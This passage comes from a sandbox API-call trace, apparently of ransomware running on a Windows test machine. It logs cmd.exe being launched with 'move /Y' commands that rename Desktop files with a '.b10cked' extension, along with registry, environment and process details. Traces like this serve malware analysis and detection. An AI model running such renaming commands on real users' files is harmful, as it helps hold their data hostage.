(penv=0x2c0178) returned 1 [0225.574] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeb74 | out: phkResult=0x1aeb74*=0x40) returned 0x0 [0225.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0xa0, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.574] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x1, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x1, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.574] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x0, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x40, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x40, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x40, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.575] RegCloseKey (hKey=0x40) returned 0x0 [0225.575] RegOpenKeyExW (in: 
hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeb74 | out: phkResult=0x1aeb74*=0x40) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x40, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x1, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x1, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x0, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x9, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x4, lpData=0x1aeb80*=0x9, lpcbData=0x1aeb78*=0x4) returned 0x0 [0225.575] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeb7c, lpData=0x1aeb80, lpcbData=0x1aeb78*=0x1000 | out: lpType=0x1aeb7c*=0x0, lpData=0x1aeb80*=0x9, lpcbData=0x1aeb78*=0x1000) returned 0x2 [0225.575] RegCloseKey (hKey=0x40) returned 0x0 [0225.575] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.575] srand (_Seed=0x5b8863b9) 
[0225.575] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"" [0225.575] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"" [0225.576] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.576] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.576] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.576] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.576] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.576] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.576] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.576] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.576] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.576] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.576] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.576] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.576] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.576] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.577] GetEnvironmentStringsW () returned 0x2c22c8* [0225.577] 
FreeEnvironmentStringsW (penv=0x2c22c8) returned 1 [0225.577] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.577] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.577] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.577] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.577] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.577] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.577] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.577] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.577] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.577] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.577] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af940 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.577] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af940, lpFilePart=0x1af93c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af93c*="Desktop") returned 0x18 [0225.577] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.577] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af6bc | out: lpFindFileData=0x1af6bc) returned 0x2c0008 [0225.578] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0225.578] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af6bc | out: lpFindFileData=0x1af6bc) returned 0x2c0008 [0225.578] FindClose (in: hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0225.578] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af6bc | out: lpFindFileData=0x1af6bc) returned 0x2c0008 [0225.578] FindClose (in: 
hFindFile=0x2c0008 | out: hFindFile=0x2c0008) returned 1 [0225.578] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.578] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.578] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.578] GetEnvironmentStringsW () returned 0x2c2ae8* [0225.579] FreeEnvironmentStringsW (penv=0x2c2ae8) returned 1 [0225.579] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.579] GetConsoleOutputCP () returned 0x1b5 [0225.579] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.579] GetUserDefaultLCID () returned 0x409 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afa80, cchData=128 | out: lpLCData="0") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afa80, cchData=128 | out: lpLCData="0") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afa80, cchData=128 | out: lpLCData="1") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.580] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.580] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.580] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.581] GetConsoleTitleW (in: lpConsoleTitle=0x2b08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.582] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.582] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.582] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.582] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.583] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.583] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.583] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.583] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.583] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.583] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.583] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.586] GetConsoleTitleW (in: lpConsoleTitle=0x1af778, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.680] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.680] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.680] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.680] 
_wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.680] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.680] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.680] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.680] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.680] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.680] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.680] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.680] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.680] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.680] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.680] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.680] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.680] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.680] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.680] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.680] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.680] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.680] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.680] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.680] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.680] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.680] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.680] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.680] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.680] _wcsicmp (_String1="move", _String2="DPATH") 
returned 9 [0225.680] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.680] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.682] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af534, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af52c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", 
_MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.683] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.684] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.684] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.684] _wcsicmp (_String1="KAWGR8~1.SWF", _String2=".") returned 61 [0225.684] _wcsicmp (_String1="KAWGR8~1.SWF", _String2="..") returned 61 [0225.684] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8~1.swf")) returned 0x20 [0225.685] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x2c1d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.685] SetErrorMode (uMode=0x0) returned 0x0 [0225.685] SetErrorMode (uMode=0x1) returned 0x0 [0225.685] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", nBufferLength=0x104, lpBuffer=0x1aeebc, lpFilePart=0x1aeea4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", lpFilePart=0x1aeea4*="KAWGR8~1.SWF") returned 0x25 [0225.685] SetErrorMode (uMode=0x0) returned 0x1 [0225.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.685] _wcsicmp (_String1="KAWGR8~1.SWF", _String2=".") returned 61 [0225.685] _wcsicmp (_String1="KAWGR8~1.SWF", _String2="..") returned 61 [0225.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8~1.swf")) returned 0x20 [0225.685] SetErrorMode (uMode=0x0) returned 0x0 [0225.685] SetErrorMode (uMode=0x1) returned 0x0 [0225.685] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", nBufferLength=0x104, lpBuffer=0x1af338, lpFilePart=0x1af0d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", lpFilePart=0x1af0d0*="KAWGR8~1.SWF") returned 0x25 [0225.685] SetErrorMode (uMode=0x0) returned 0x1 [0225.686] SetErrorMode (uMode=0x0) returned 0x0 [0225.686] SetErrorMode (uMode=0x1) returned 0x0 [0225.686] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked", nBufferLength=0x104, lpBuffer=0x1af540, lpFilePart=0x1af0d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked", lpFilePart=0x1af0d0*="kawGr8UmxCuLrfZA.swf.b10cked") returned 0x35 [0225.686] SetErrorMode (uMode=0x0) returned 0x1 [0225.686] SetLastError (dwErrCode=0x0) [0225.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked" (normalized: 
"c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf.b10cked")) returned 0xffffffff [0225.686] GetLastError () returned 0x2 [0225.686] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", fInfoLevelId=0x1, lpFindFileData=0x1aea4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aea4c) returned 0x2b0f20 [0225.686] FindNextFileW (in: hFindFile=0x2b0f20, lpFindFileData=0x1aea4c | out: lpFindFileData=0x1aea4c) returned 0 [0225.687] GetLastError () returned 0x12 [0225.687] FindClose (in: hFindFile=0x2b0f20 | out: hFindFile=0x2b0f20) returned 1 [0225.688] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF", fInfoLevelId=0x1, lpFindFileData=0x2c1af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2c1af0) returned 0x2b0f20 [0225.688] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked", nBufferLength=0x104, lpBuffer=0x1aece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked", lpFilePart=0x0) returned 0x35 [0225.688] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf", nBufferLength=0x104, lpBuffer=0x1aece4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf", lpFilePart=0x0) returned 0x2d [0225.688] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf")) returned 0x20 [0225.688] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf.b10cked"), dwFlags=0x3) returned 1 [0225.689] FindClose (in: hFindFile=0x2b0f20 | out: hFindFile=0x2b0f20) returned 1 [0225.689] _vsnwprintf (in: _Buffer=0x49e25040, 
_BufferCount=0x103, _Format="%9d", _ArgList=0x1aec98 | out: _Buffer=" 1") returned 9 [0225.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.689] GetFileType (hFile=0x7) returned 0x2 [0225.690] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.690] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aec24 | out: lpMode=0x1aec24) returned 1 [0225.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.690] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aec58 | out: lpConsoleScreenBufferInfo=0x1aec58) returned 1 [0225.690] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.691] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x1aec98 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.691] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aec7c, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x1aec7c*=0x1a) returned 1 [0225.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.691] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.691] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.691] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.691] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.691] SetConsoleInputExeNameW () returned 0x1 [0225.691] GetConsoleOutputCP () returned 0x1b5 [0225.692] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.692] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.692] exit (_Code=0) Process: id = "592" image_name = "cmd.exe" filename = 
"c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xeac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33609 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33610 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33611 start_va = 0x40000 